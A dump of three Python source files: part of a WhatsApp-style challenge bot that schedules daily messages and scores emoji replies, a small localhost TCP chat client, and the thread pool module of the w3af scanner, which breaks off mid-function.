time.sleep(1)
for ch in self.db["challenges"]:
challenge = self.db["challenges"][ch]
if "upcoming" not in challenge:
challenge["upcoming"] = {}
if "template" not in challenge:
challenge["template"] = "international"
sent = []
for up in challenge["upcoming"]:
# print("UP",up)
timeDiff = time.time() - search_dates(up)[0][1].timestamp()
passedTime = timeDiff > 0 and timeDiff < lastHour
if passedTime:
try:
day = challenge["today"]
# if day in self.push and up in self.push[day]:
if day in self.push[challenge["template"]] and up in self.push[challenge["template"]][day]:
content = self.push[challenge["template"]][day][up]
if content is not None:
content = content.replace(
"DDD", str(day)).replace("TTT", up)
print(
"#################### SENDING PUSH TO C18", ch, "DAY", day, "time", up)
sent.append(up)
# send to user
if self.isCommand(content):
tCommand = Thread(target = self.commands[content.split("/")[0]], args = [{"origin":ch, "content":content}])
tCommand.start()
else:
self.api.send(
ch, content, autoPreview=True)
needsBackup = True
except:
traceback.print_exc()
for up in sent:
challenge["upcoming"].pop(up)
# challenge["today"] += 1
time.sleep(5)
if needsBackup:
self.backup()
needsBackup = False
def isCommand(self, content):
return content.split("/")[0] in self.commands
def sendTotalHeb(self, data, ret = False):
return self.sendTotal(data,ret=ret, defaultLanguage = "hebrew")
def sendPublic(self, data, ret = False, defaultLanguage = "internetional", strings = {"default": "{0}"}):
origin, content = None, ""
if "origin" in data:
origin = data["origin"]
res = self.getChallengeScore(data)
if res is not None:
self.api.send(
origin, strings["default"].format(res), autoPreview=True)
def sendTotal(self, data, ret = False, defaultLanguage = "internetional", strings = {
"international":
'''
🌴🌴🌴🌴🌴🌴🌴
*Total Points in the group: {0}*
🐋🌸🙏
'''
,
"hebrew":
'''
🌴🌴🌴🌴🌴🌴🌴🌴
*ניקוד קבוצתי מצטבר: {0}*
🙏🌍 *אתגר 18* 🐋🌸
''',
"family":
'''
🌴🌴🌴🌴🌴🌴🌴
*Total Points in the group: {0}*
🐋🌸🙏
'''
,
"familyheb":
'''
🌴🌴🌴🌴🌴🌴🌴🌴
*ניקוד קבוצתי מצטבר: {0}*
🙏🌍 *אתגר 18* 🐋🌸
''',
}):
print("DDDDDDDDDDd")
print(data)
print("DDDDDDDDDDd")
origin, content = None, ""
if "origin" in data:
origin = data["origin"]
total = 0
if self.manager is None:
print("XXXXXXXXXXX NO MANAGER")
# self.manager = self.Challenge18Manager.share
# res = self.manager.getChallenge({"origin":origin})
res = self.getChallenge({"origin":origin})
print("RRRRRRRRRRRRRRRRRRRRR")
print("RRRRRRRRRRRRRRRRRRRRRoooooooo")
print(res)
print("RRRRRRRRRRRRRRRRRRRRR")
print("RRRRRRRRRRRRRRRRRRRRR")
if "template" in res:
defaultLanguage = res["template"].lower()
if defaultLanguage not in strings:
if "heb" in defaultLanguage:
defaultLanguage = "hebrew"
else:
defaultLanguage = "international"
print("RRRRRRRRRRRRRRRRRRRRRoooooooo", "template",defaultLanguage)
if "total" in res:
total += res["total"]
content = strings[defaultLanguage].format(str(total))
# content += str(total)+"*"
# content += "\n"
else:
content = ""
if not ret and content != "":
self.api.send(
origin, content, autoPreview=True)
else:
return content
def go(self):
resetLast2000 = False
while "challenges" not in self.db:
print("C18 waiting for db")
time.sleep(2)
if "last2000" not in self.db or resetLast2000:
self.db["last2000"] = 0
# self.backup()
print("22222222222222222222222222222222222222222222000")
while(True):
# if "upcoming" not in self.db or "0dict" not in str(type(self.db["upcoming"])):
# self.db["upcoming"] = {}
if "users" not in self.db:
self.db["users"] = {}
''' UPDATE CHALLENGE DAYS '''
''' SEND DAYLIES '''
''' USER engagment '''
''' check time after 20:00 '''
dayly = 60 * 60 * 23
# dayly = 60*60*13
# dayly = 60
atTime = "19:30"
# passed2000 = time.time() - search_dates("20:00")[0][1].timestamp() > 0
# print("C18",time.time(),"\nc18",search_dates(atTime)[0][1].timestamp(),"\n",self.db["last2000"])
passed2000 = time.time() - \
search_dates(atTime)[0][1].timestamp() > 0
try:
# print(passed2000, time.time() ,"\n", self.db["last2000"] ,"\n", dayly)
if passed2000 and time.time() - self.db["last2000"] > dayly:
self.db["last2000"] = time.time()
for ch in self.db["challenges"]:
challenge = self.db["challenges"][ch]
# for challenge in self.db["challenges"]:
# self.db["challenges"][challenge]["today"] += 1
self.db["challenges"][ch]["today"] = self.updateDay(self.db["challenges"][ch]["today"], ch = ch)
# if self.db["challenges"][challenge]["today"] == 0:
# self.db["challenges"][challenge]["today"] += 1
day = self.db["challenges"][ch]["today"]
if self.debug:
# send to user
self.api.send(
ch, "CHALLENGE CHANGED TO DAY " + str(day)+"\n"+self.db["challenges"][ch])
if "template" not in challenge:
challenge["template"] = "international"
if day in self.push[challenge["template"]]:
for tm in self.push[challenge["template"]][day]:
self.db["challenges"][ch]["upcoming"][tm] = "_"
print("@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@", ch,
"DAY: ", challenge["today"])
self.backup()
except:
traceback.print_exc()
# passed2000 update day += 1
# while len(self.db["upcoming"]) > 0:
# key = self.db["upcoming"].pop(0)
# origin, content = item
# for key in list(self.db["upcoming"].keys()):
# t = self.db["upcoming"][key]
# if time.time()-t > 0:
# userID,remID = key.split("_")
# self.remind(userID, remID)
#
#
#
time.sleep(3)
def loadDay(self, ch, origin = None):
if ch in self.db["challenges"]:
challenge = self.db["challenges"][ch]
# for challenge in self.db["challenges"]:
# self.db["challenges"][challenge]["today"] += 1
# self.db["challenges"][ch]["today"] = self.updateDay(self.db["challenges"][ch]["today"])
# if self.db["challenges"][challenge]["today"] == 0:
# self.db["challenges"][challenge]["today"] += 1
day = self.db["challenges"][ch]["today"]
if "template" not in challenge:
challenge["template"] = "international"
print("LOADING DAYYYYYYYYYYYYYYYYYYYYYYYYYY")
print("LOADING DAYYYYYYYYYYYYYYYYYYYYYYYYYY")
print("LOADING DAYYYYYYYYYYYYYYYYYYYYYYYYYY")
print("LOADING DAYYYYYYYYYYYYYYYYYYYYYYYYYY")
print("LOADING DAYYYYYYYYYYYYYYYYYYYYYYYYYY")
self.db["challenges"][ch]["upcoming"] = {}
if day in self.push[challenge["template"]]:
for tm in self.push[challenge["template"]][day]:
self.db["challenges"][ch]["upcoming"][tm] = "_"
print(day, self.push[challenge["template"]][day][tm] , "_____________________________")
print("@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@", ch,
"DAY: ", challenge["today"])
if origin:
# send to user
self.api.send(
origin, "CHALLENGE CHANGED TO DAY " + str(day)+"\n"+str(self.db["challenges"][ch]))
def prepUser(self, user, day):
if "days" not in self.db["users"][user]:
self.db["users"][user]["days"] = {}
if day not in self.db["users"][user]["days"]:
self.db["users"][user]["days"][day] = 0
if "score" not in self.db["users"][user]:
self.db["users"][user]["score"] = 1
def hasDay(self, msg):
return False, -1, msg
def emojiValue(self, char):
''' get emoji values '''
''' strip all characters '''
for k in self.emojiValues:
if char in self.emojiValues[k]:
return k
print(char + " in " + str(self.emojiValues[k]))
return 1
def char_is_emoji(self, character):
return character in emoji.UNICODE_EMOJI
def getScore(self, msg, max=6):
''' count hearts and emoji values '''
# nmsg = ''.join(c for c in msg if c.isprintable())
# if len(msg) != len(nmsg):
# print("HHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHH")
# print("HHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHH")
# print("HHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHH")
# print("HHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHH")
# print("HHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHH")
# msg = nmsg
sum = 0
backmsg = ""
for char in msg:
if self.char_is_emoji(char) or char is "@":
print("CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC", msg)
print("x" + char + "x")
sum += self.emojiValue(char)
backmsg += char
return sum, backmsg.replace("@", "❤️")
def rate(self, group, msg, user):
print("RATE1")
challenge = None
if group in self.db["challenges"]:
print("RATE2")
challenge = self.db["challenges"][group]
day = challenge["today"]
isDay, d, m = self.hasDay(msg)
if isDay:
day = d
msg = m
''' max by day '''
score, backmsg = self.getScore(
msg.replace(" ", "").replace("❤️", "@"), max=6)
self.prepUser(user, day)
''' get score - later check by task'''
self.db["users"][user]["score"] += score
self.db["users"][user]["days"][day] += score
if score > 0:
''' for now just thankyou - later add custom message based on score / random '''
# sendBack = "🙏🌍 *Challenge18* 🐋🌸"+"\n\n*Thank you!* "+user.split("@")[0]+"\n*your current score is now "+str(self.db["users"][user]["score"])+"*"
sendBack = "🙏🌍 *Challenge18* 🐋🌸" + "\n" + "Day " + \
str(day) + " - " + backmsg + "\n*Thank you!* " + \
"\n*your current score is now " + \
str(self.db["users"][user]["score"]) + "*"
''' for now send directly to user - later in group '''
print("RATE3",user,sendBack)
self.api.send(user, sendBack) # send to user
# self.api.send(group,sendBack) # send to user
def process(self, info):
origin, user, content = None, None, None
if "origin" in info:
origin = info["origin"]
if "user" in info:
user = info["user"]
if "content" in info:
content = info["content"]
if "users" not in self.db:
self.db["users"] = {}
if "challenges" not in self.db:
self.db["challenges"] = {}
dbChanged = False
userID = str(user)
if userID not in self.db["users"]:
self.db["users"][userID] = {}
dbChanged = True
if origin not in self.db["challenges"]:
self.db["challenges"][origin] = self.formatChallenge()
dbChanged = True
challenge = self.db["challenges"][origin]
if "template" not in challenge:
challenge["template"] = "international"
if "day=" in content.lower():
for m in self.addMasters:
if user.split("@")[0] in m:
gotDay = None
res = re.findall("[-\d]+", content)
if len(res) > 0:
try:
gotDay = int(res[0])
except:
traceback.print_exc()
if "template" not in self.db["challenges"][origin]:
self.db["challenges"][origin]["template"] = "international"
self.db["challenges"][origin] = self.formatChallenge(
day=gotDay, template = self.db["challenges"][origin]["template"])
# self.loadDay(origin)
self.api.send(origin, "CHALLENGE CHANGED TO DAY " + str(self.db["challenges"][origin]["today"]) + "\n" + str(self.db["challenges"][origin])) # send to user
dbChanged = True
if "template=" in content.lower() or "tem=" in content.lower():
for m in self.addMasters:
if user.split("@")[0] in m:
gotTemplate = None
# res = re.findall("[-\d]+", content)
res = content.split("=")[1]
if len(res) > 0 and res in self.push:
try:
self.db["challenges"][origin]["template"] = res
self.db["challenges"][origin] = self.formatChallenge(
day=self.db["challenges"][origin]["today"], template = self.db["challenges"][origin]["template"])
self.api.send(origin, "CHALLENGE TEMPLATE TO " + self.db["challenges"][origin]["template"]) # send to user
dbChanged = True
except:
traceback.print_exc()
self.api.send(origin, "COULD NOT CHANGE TEMPLATE ERROR"+traceback.format_exc()) # send to user
else:
txt = "COULD NOT CHANGE TEMPLATE to "+res
txt+= "\n\nAvailable templates:\n"
for k in self.push:
txt+=k+"\n"
self.api.send(origin, txt) # send to user
elif "sim" == content.split("/")[0].lower():
for m in self.addMasters:
if user.split("@")[0] in m:
self.simulation = True
emptyContent = False
noTimes = True
allDays = False
showDay = 3
if "all" in content:
allDays = True
elif len(content.split("/")) > 1:
try:
simDay = int(content.split("/")[1])
showDay = simDay
except :
pass
currentDay = self.db["challenges"][origin]["today"]
# send to user
self.api.send(
origin, "SIMULATING ALL DAYS OF THE CHALLENGE !!!!!!! READY? GO!")
for d in self.push[challenge["template"]]:
if (d > (showDay-1) and d < (showDay+1)) or allDays:
self.db["challenges"][origin] = self.formatChallenge(
day=d, template = self.db["challenges"][origin]["template"])
self.api.send(origin, "=====================\n(Simulation) DAY " + str(self.db["challenges"][origin]["today"]) + "\n" + str(
self.db["challenges"][origin]) + "\n\n=====================") # send to user
print("_____________________________________")
print("_____________________________________")
print("_____________________________________")
print("DAY ", d)
time.sleep(.5)
print(self.push[challenge["template"]][d].keys())
print(str(self.db["challenges"]
[origin]["upcoming"]))
for atTime, v in self.db["challenges"][origin]["upcoming"].items():
print("_____________________________________")
print()
print(d, "AT TIME:::", atTime)
sendTxt = str(self.push[challenge["template"]][d][atTime])
if "#totalPointsHeb" in sendTxt:
sendTxt = self.sendTotal({"origin":origin, "content":""},ret=True)
elif "#totalPoints" in sendTxt:
sendTxt = self.sendTotal({"origin":origin, "content":""},ret=True)
if noTimes:
self.api.send(origin, sendTxt, autoPreview=True)
elif not emptyContent:
self.api.send(origin, "DAY " + str(d) + " " + atTime +
"\n\n\n" + sendTxt, autoPreview=True)
else:
self.api.send(
origin, "DAY " + str(d) + " " + atTime + "\n", autoPreview=True)
time.sleep(.5)
self.db["challenges"][origin] = self.formatChallenge(
day=currentDay)
self.api.send(origin, "FIN - SIMULATING - BACK TO DAY " + str(
self.db["challenges"][origin]["today"]) + "\n" + str(self.db["challenges"][origin]))
self.simulation = False
else:
thisDay = self.db["challenges"][origin]["today"]
if userID not in self.excludeNumbers:
firstWord = content.split("\n")[0].split(" ")[0]
if firstWord not in self.commands:
goRate = True
if "username" not in self.db["users"][userID] or self.db["users"][userID]["username"] is None:
if "user=" not in firstWord.lower():
self.signupUser(userID, origin)
else:
regRes = self.registerUsername(firstWord.split("=")[1], userID)
goRate = False
if regRes:
dbChanged = True
else:
tCommand = Thread(target = self.commands[content.split("/")[0]], args = [{"origin":origin, "content":content}])
tCommand.start()
goRate = False
dbChanged = False
if thisDay < 0 or thisDay>9999:
print("DONT RATE BEFORE FIRSTDAY", thisDay)
goRate = False
if goRate:
self.rate(origin, content, userID)
dbChanged = True
else:
print("SHARON!!!!!!!!!!!!")
print("SHARON!!!!!!!!!!!!")
print("SHARON!!!!!!!!!!!!")
print("SHARON!!!!!!!!!!!!")
print("SHARON!!!!!!!!!!!!")
print("SHARON!!!!!!!!!!!!")
print("SHARON!!!!!!!!!!!!")
# user = self.db["users"][userID]
if dbChanged:
self.backup()
# self.api.backup(self.db)
def signupUser(self, userID, challengeGroup):
signupMessage = "To show up on the scoreboard please choose a username, and send back:\n\n*user=MyUserName*"
self.api.send(userID, signupMessage, autoPreview=True)
def registerUsername(self, username, userID, fullData):
res = self.usernameLegal(username, userID)
if res[0]:
res2 = self.checkPhone(userID)
if not res2[0]:
return res2
if userID not in self.db["users"]:
self.db["users"][userID] = {}
self.db["users"][userID]["username"] = username #xxx
if "register" in fullData:
for k in fullData["register"]:
self.db["users"][userID][k] = fullData["register"][k]
elif fullData is not None and "dict" in str(type(fullData)) and len(fullData) > 1:
for k in fullData:
self.db["users"][userID][k] = fullData[k]
self.backup()
else:
return res
sendBack = res[1]
self.api.send(userID, sendBack, autoPreview=True)
return res
def usernameLegal(self, username, userID):
for user in self.db["users"]:
if "username" in self.db["users"][user]:
# print("#####################")
# print(user["username"], userID)
if self.db["users"][user]["username"] == username and user != userID:
return False, "Oops! This username is already taken,\nplease choose another :)"
return True, "Great! your username is now: *{0}*".format(username)
def checkUsername(self, username):
for user in self.db["users"]:
if "username" in self.db["users"][user]:
if self.db["users"][user]["username"].lower() == username.lower():
return False, "Oops! This username is already taken,\nplease choose another :)"
return True, "Great! you can register with username: *{0}*".format(username)
def checkPhone(self, userID):
userID = userID.split("@")[0].strip("+")+"@c.us"
if userID in self.db["users"]:
if "username" in self.db["users"][userID] and self.db["users"][userID]["username"] is not None and len(self.db["users"][userID]["username"]) > 1:
return False, "Oops! This phone is already taken,\nplease choose another :)"
return True, "Great! you can register with this phone *{0}*".format(userID)
# https://flask-jwt-extended.readthedocs.io/en/stable/basic_usage/
def getToken(self, userID):
access_token = create_access_token(identity=userID)
def signIn(self, username, userID):
print("SIGN IN {0},{1}".format(username,userID))
for user in self.db["users"]:
if "username" in self.db["users"][user]:
if self.db["users"][user]["username"] == username and user == userID:
print("FUCK YEA")
print("FUCK YEA")
print("FUCK YEA")
print("FUCK YEA")
return True, userID
return False, userID
def backup(self):
self.api.backup(self.db)
# self.api.backup({"upcoming":self.db["upcoming"],"users":User.usersToJSONusers(self.db["users"])})
def formatChallenge(self, day=None, template = "international"):
if day is None:
today = datetime.date.today()
if today == today + datetime.timedelta((0 - today.weekday()) % 7, weeks=0):
day = today + \
datetime.timedelta((0 - today.weekday()) % 7, weeks=1)
else:
day = today + \
datetime.timedelta((0 - today.weekday()) % 7, weeks=0)
day = (0 - today.weekday()) % 7
if day is 0:
day = -7
else:
day = -1 * day
day = day - 7
nc = {"today": day, "upcoming": {}, "template": template}
# for k in cFormat:
# nc[k] = cFormat[k]
#
# nc["today"] = day
# if "upcoming" not in nc:
# nc["upcoming"] = {}
if day in self.push[template]:
for tm in self.push[template][day]:
nc["upcoming"][tm] = "_"
return nc
def updateDB(self, db):
self.db = db
def nextNextMonday(self):
return day
def welcomeUser(self, origin):
print("WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW")
print("WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW")
print("WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW")
print("WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW")
if "users" not in self.db:
self.db["users"] = {}
# if origin not in self.db["users"]:
# self.db["users"][origin] = origin
# self.backup()
if "challenges" not in self.db:
self.db["challenges"] = {}
if origin not in self.db["challenges"]:
# res = search_dates("next monday 20:00", add_detected_language=True)
# if res is not None:
# res= res[0][1]
# else:
# pass
self.db["challenges"][origin] = self.formatChallenge()
self.api.send(origin, "CHALLENGE SET TO DAY " + str(
self.db["challenges"][origin]["today"]) + "\n" + str(self.db["challenges"][origin])) # send to user
dbChanged = True
|
node.py
|
import socket
import time
import threading
TCP_IP = "127.0.0.1"
TCP_PORT = 5007
BUFFER_SIZE = 1024
session_end = False
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(3.0)
s.connect((TCP_IP, TCP_PORT))
def handler(user_socket):
while True:
if (session_end == True):
break
try:
data = user_socket.recv(BUFFER_SIZE)
if (data == None):
break
print()
print ("Broadcast: " + data.decode('utf-8'))
except socket.timeout:
continue
user_handler = threading.Thread(target=handler, args = (s,))
user_handler.start()
while not session_end:
time.sleep(0.1)
input_data = input("What would you like to send? (exit): ")
print ()
if (input_data == "exit"):
session_end = True
print ("session end")
user_handler.join()
break
s.send(input_data.encode('utf-8'))
s.close()
|
threadpool.py
|
"""
threadpool.py
Copyright 2006 Andres Riancho
This file is part of w3af, http://w3af.org/ .
w3af is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation version 2 of the License.
w3af is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with w3af; if not, write to the Free Software
Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
"""
import sys
import time
import Queue
import threading
import traceback
from functools import partial
from multiprocessing.dummy import Process, current_process
from multiprocessing.util import Finalize, debug
from multiprocessing import cpu_count
from .pool276 import ThreadPool, RUN, create_detailed_pickling_error, mapstar
from w3af.core.data.fuzzer.utils import rand_alnum
from w3af.core.controllers.threads.decorators import apply_with_return_error
__all__ = ['Pool', 'return_args', 'one_to_many']
class one_to_many(object):
"""
This is a simple wrapper that translates one argument to many in a function
call. Useful for passing to the threadpool map function.
"""
def __init__(self, func):
self.func_orig = func
# Similar to functools wraps
self.__name__ = func.__name__
self.__doc__ = func.__doc__
def __call__(self, args):
return self.func_orig(*args)
class return_args(object):
"""
Utility function that returns the args in the result, useful when calling
functions like imap_unordered().
"""
def __init__(self, func, *args, **kwds):
self.func = partial(func, *args, **kwds)
# Similar to functools wraps
self.func_orig = func
self.__name__ = func.__name__
self.__doc__ = func.__doc__
def __call__(self, *args, **kwds):
return args, self.func(*args, **kwds)
class DaemonProcess(Process):
def __init__(self, group=None, target=None, name=None, args=(), kwargs={}):
super(DaemonProcess, self).__init__(group, target, name, args, kwargs)
self.daemon = True
self.worker = target
self.name = name
def get_state(self):
state = self.worker.get_state()
state['name'] = self.name
return state
def is_idle(self):
return self.worker.is_idle()
def start(self):
"""
This is a race condition in DaemonProcess.start() which was found
during some of the test scans I run. The race condition exists
because we're using Threads for a Pool that was designed to be
used with real processes: thus there is no worker.exitcode,
thus it has to be simulated in a race condition-prone way.
I'm overriding this method in order to move this line:
self._start_called = True
Closer to the call to .start(), which should reduce the chances
of triggering the race conditions by 1% ;-)
"""
assert self._parent is current_process()
if hasattr(self._parent, '_children'):
self._parent._children[self] = None
self._start_called = True
threading.Thread.start(self)
def add_traceback_string(_exception):
"""
Add the traceback string as a new attribute to the exception raised
by the target function defined by the developer.
Adding this original traceback allows us to better understand the
root cause for exceptions that happen in functions which are run inside
the Pool (most).
For example, this is an exception stored in a /tmp/w3af-crash file before
this patch:
A "TypeError" exception was found while running crawl.phpinfo on "Method: GET | http://domain/".
The exception was: "unsupported operand type(s) for -: 'float' and 'NoneType'" at pool276.py:get():643.
The full traceback is:
File "/home/user/tools/w3af/w3af/core/controllers/core_helpers/consumers/crawl_infrastructure.py", line 533, in _discover_worker
result = plugin.discover_wrapper(fuzzable_request)
File "/home/user/tools/w3af/w3af/core/controllers/plugins/crawl_plugin.py", line 53, in crawl_wrapper
return self.crawl(fuzzable_request_copy)
File "/home/user/tools/w3af/w3af/plugins/crawl/phpinfo.py", line 148, in crawl
self.worker_pool.map_multi_args(self._check_and_analyze, args)
File "/home/user/tools/w3af/w3af/core/controllers/threads/threadpool.py", line 430, in map_multi_args
return self.map_async(one_to_many(func), iterable, chunksize).get()
File "/home/user/tools/w3af/w3af/core/controllers/threads/pool276.py", line 643, in get
raise self._value
And after adding the original traceback and using it in exception_handler.py:
A "TypeError" exception was found while running crawl.phpinfo on "Method: GET | http://domain/".
The exception was: "unsupported operand type(s) for -: 'float' and 'NoneType'" at pool276.py:get():643.
The full traceback is:
Traceback (most recent call last):
File "/home/user/tools/w3af/w3af/core/controllers/threads/threadpool.py", line 238, in __call__
result = (True, func(*args, **kwds))
File "/home/user/tools/w3af/w3af/core/controllers/threads/pool276.py", line 67, in mapstar
return map(*args)
File "/home/user/tools/w3af/w3af/core/controllers/threads/threadpool.py", line 55, in __call__
return self.func_orig(*args)
File "/home/user/tools/w3af/w3af/plugins/crawl/phpinfo.py", line 180, in _check_and_analyze
1.0 - None
TypeError: unsupported operand type(s) for -: 'float' and 'NoneType'
The exact line where the exception is raised is shown!
Adding new attributes to instances is not something I like, but in
this case I had no choice...
Creating a new Exception type and wrapping all exceptions generated
by the pool with that one wouldn't work: we lose the exception type
and can't do:
try:
...
except TypeError:
...
The code for the whole framework would need to be changed to something
like:
try:
...
except PoolException, pe:
if isinstance(pe.original_exception, TypeError):
...
:param _exception: The exception instance where to add the new attribute
:return: None
"""
except_type, except_class, tb = sys.exc_info()
tb = traceback.format_exception(type(_exception), _exception, tb)
_exception.original_traceback_string = ''.join(tb)
class Worker(object):
__slots__ = ('func', 'args', 'kwargs', 'start_time', 'job', 'id')
def __init__(self):
self.func = None
self.args = None
self.kwargs = None
self.start_time = None
self.job = None
self.id = rand_alnum(8)
def is_idle(self):
return self.func is None
def get_real_func_name_args(self):
"""
Because of various levels of abstraction the function name is not always in
self.func.__name__, this method "unwraps" the abstractions and shows us
something easier to digest.
:return: The function name
"""
# self.func/self.args could change over the execution of this method, so take
# a copy here.
current_func = self.func
current_args = self.args
if current_func is mapstar:
current_func = current_args[0][0]
current_args = current_args[0][1:]
if current_func is apply_with_return_error:
current_func = current_args[0][0]
current_args = current_args[0][1:]
if isinstance(current_func, return_args):
return current_func.func_orig.__name__, current_args
if isinstance(current_func, one_to_many):
return current_func.func_orig.__name__, current_args
if current_func is None:
return None, None
return current_func.__name__, current_args
def get_state(self):
func_name, func_args = self.get_real_func_name_args()
return {'func_name': func_name,
'args': func_args,
'kwargs': self.kwargs,
'start_time': self.start_time,
'idle': self.is_idle(),
'job': self.job,
'worker_id': self.id}
def __call__(self, inqueue, outqueue, initializer=None, initargs=(), maxtasks=None):
assert maxtasks is None or (type(maxtasks) in (int, long) and maxtasks > 0)
put = outqueue.put
get = inqueue.get
if hasattr(inqueue, '_writer'):
inqueue._writer.close()
outqueue._reader.close()
if initializer is not None:
initializer(*initargs)
completed = 0
while maxtasks is None or (maxtasks and completed < maxtasks):
try:
task = get()
except (EOFError, IOError):
debug('worker got EOFError or IOError -- exiting')
break
if task is None:
debug('worker got sentinel -- exiting')
break
job, i, func, args, kwds = task
# Tracking
self.func = func
self.args = args
self.kwargs = kwds
self.start_time = time.time()
self.job = job
try:
result = (True, func(*args, **kwds))
except Exception, e:
add_traceback_string(e)
result = (False, e)
# Tracking
self.func = None
self.args = None
self.kwargs = None
self.start_time = None
self.job = None
try:
put((job, i, result))
except Exception as e:
wrapped = create_detailed_pickling_error(e, result[1])
put((job, i, (False, wrapped)))
finally:
# https://bugs.python.org/issue29861
task = None
job = None
result = None
func = None
args = None
kwds = None
completed += 1
debug('worker exiting after %d tasks' % completed)
class Pool(ThreadPool):
def __init__(self, processes=None, initializer=None, initargs=(),
worker_names=None, maxtasksperchild=None,
max_queued_tasks=0):
"""
Overriding this method in order to:
* Name the pool worker threads
* Name the threads used for managing the Pool internals
"""
self.Process = partial(DaemonProcess, name=worker_names)
self.worker_names = worker_names
# Setting the max number of queued tasks for the ThreadPool is not
# as simple as it looks.
#
# First I tried to limit the max size of self._inqueue (defined
# in _setup_queues), that didn't work.
#
# Then I tried to limit the size for self._taskqueue, that didn't
# work either.
#
# I had to set the maxsize of self._taskqueue to 1 and use the
# max_queued_tasks parameter to limit the size of self._inqueue
# This is required due to the ThreadPool internals, see the
# definition of the _handle_tasks method in pool276.py where
# the function is reading from self._taskqueue and writing to
# self._inqueue.
#
# Not setting the limit in self._taskqueue allows the main thread
# to enqueue an infinite number of tasks.
#
# Only setting the limit in self._taskqueue will not work, since
# the _handle_tasks method is always reading from that queue
# (which decreases its size) and writing to self._inqueue. Because
# of those reads to self._taskqueue, the queue never reaches the
# limit.
#
if max_queued_tasks != 0:
assert max_queued_tasks - 1 > 0, 'max_queued_tasks needs to be at least 2'
self._setup_queues(max_queued_tasks - 1)
self._taskqueue = Queue.Queue(maxsize=1)
self._cache = {}
self._state = RUN
self._maxtasksperchild = maxtasksperchild
self._initializer = initializer
self._initargs = initargs
if processes is None:
try:
processes = cpu_count()
except NotImplementedError:
processes = 1
if processes < 1:
raise ValueError("Number of processes must be at least 1")
if initializer is not None and not hasattr(initializer, '__call__'):
raise TypeError('initializer must be a callable')
self._processes = processes
self._pool = []
self._repopulate_pool()
self._worker_handler = threading.Thread(
target=Pool._handle_workers,
args=(self, ),
name='PoolWorkerHandler')
self._worker_handler.daemon = True
self._worker_handler._state = RUN
self._worker_handler.start()
self._task_handler = threading.Thread(
target=Pool._handle_tasks,
args=(self._taskqueue, self._quick_put, self._outqueue,
self._pool, self._cache),
name='PoolTaskHandler')
self._task_handler.daemon = True
self._task_handler._state = RUN
self._task_handler.start()
self._result_handler = threading.Thread(
target=Pool._handle_results,
args=(self._outqueue, self._quick_get, self._cache),
name='PoolResultHandler')
self._result_handler.daemon = True
self._result_handler._state = RUN
self._result_handler.start()
self._terminate = Finalize(
self, self._terminate_pool,
args=(self._taskqueue, self._inqueue, self._outqueue, self._pool,
self._worker_handler, self._task_handler,
self._result_handler, self._cache),
exitpriority=15)
def get_inqueue(self):
return self._inqueue
def get_outqueue(self):
return self._outqueue
def get_running_task_count(self):
# Cheating here a little bit because the task queued in _inqueue will
# eventually be run by the pool, but is not yet in the pool
running_tasks = self._inqueue.qsize()
for process in self._pool[:]:
if not process.is_idle():
running_tasks += 1
return running_tasks
def _repopulate_pool(self):
"""
Bring the number of pool processes up to the specified number,
for use after reaping workers which have exited.
I overwrite this in order to change the Process target to a Worker
object (instead of a function) in order to keep better stats of
what it is doing.
"""
for i in range(self._processes - len(self._pool)):
w = self.Process(target=Worker(),
args=(self._inqueue,
self._outqueue,
self._initializer,
self._initargs,
self._maxtasksperchild))
self._pool.append(w)
w.name = w.name.replace('Process', 'PoolWorker')
w.daemon = True
w.start()
debug('added worker')
def get_worker_count(self):
return len(self._pool)
def set_worker_count(self, count):
"""
Set the number of workers.
Keep in mind that this is not an immediate when decreasing
the pool process count!
* When increasing the size, the threadpool will call
repopulate_pool() and the new threads will be created
* When decreasing the size, a thread will finish because
of maxtasksperchild, then repopulate_pool() will be
called async and the thread will *not* be created,
thus decreasing the pool size
The change is made effective depending on the work load and
the time required to finish each task.
:param count: The new process count
:return: None
"""
assert self._maxtasksperchild, 'Can only adjust size if maxtasksperchild is set'
assert count >= 1, 'Number of processes must be at least 1'
self._processes = count
self._repopulate_pool()
def _setup_queues(self, max_queued_tasks):
self._inqueue = Queue.Queue(maxsize=max_queued_tasks)
self._outqueue = Queue.Queue()
self._quick_put = self._inqueue.put
self._quick_get = self._outqueue.get
def map_multi_args(self, func, iterable, chunksize=None):
"""
Blocks until all results are done (please note the .get())
"""
assert self._state == RUN
return self.map_async(one_to_many(func), iterable, chunksize).get()
def in_qsize(self):
return self._taskqueue.qsize()
def is_running(self):
return self._state == RUN
def terminate_join(self):
self.terminate()
self.join()
def _join_exited_workers(self):
"""Cleanup after any worker processes which have exited due to reaching
their specified lifetime. Returns True if any workers were cleaned up.
"""
cleaned = False
for i in reversed(range(len(self._pool))):
worker = self._pool[i]
if worker.exitcode is not None:
# worker exited
try:
worker.join()
except RuntimeError:
#
# RuntimeError: cannot join thread before it is started
#
# This is a race condition in DaemonProcess.start() which was found
# during some of the test scans I run. The race condition exists
# because we're using Threads for a Pool that was designed to be
# used with real processes: thus there is no worker.exitcode,
# thus it has to be simulated in a race condition-prone way.
#
continue
else:
debug('cleaning up worker %d' % i)
cleaned = True
del self._pool[i]
return cleaned
def finish(self, timeout=120):
"""
Wait until all tasks in the self._inqueue have been processed (the queue
has size == 0) and then call terminate on the Pool.
I know this is not the best way of doing it, but had some dead-lock
issues with:
self.close()
self.join()
:param timeout: Wait up to timeout seconds for the queues to be empty
"""
delay = 0.1
for _ in xrange(int(timeout / delay)):
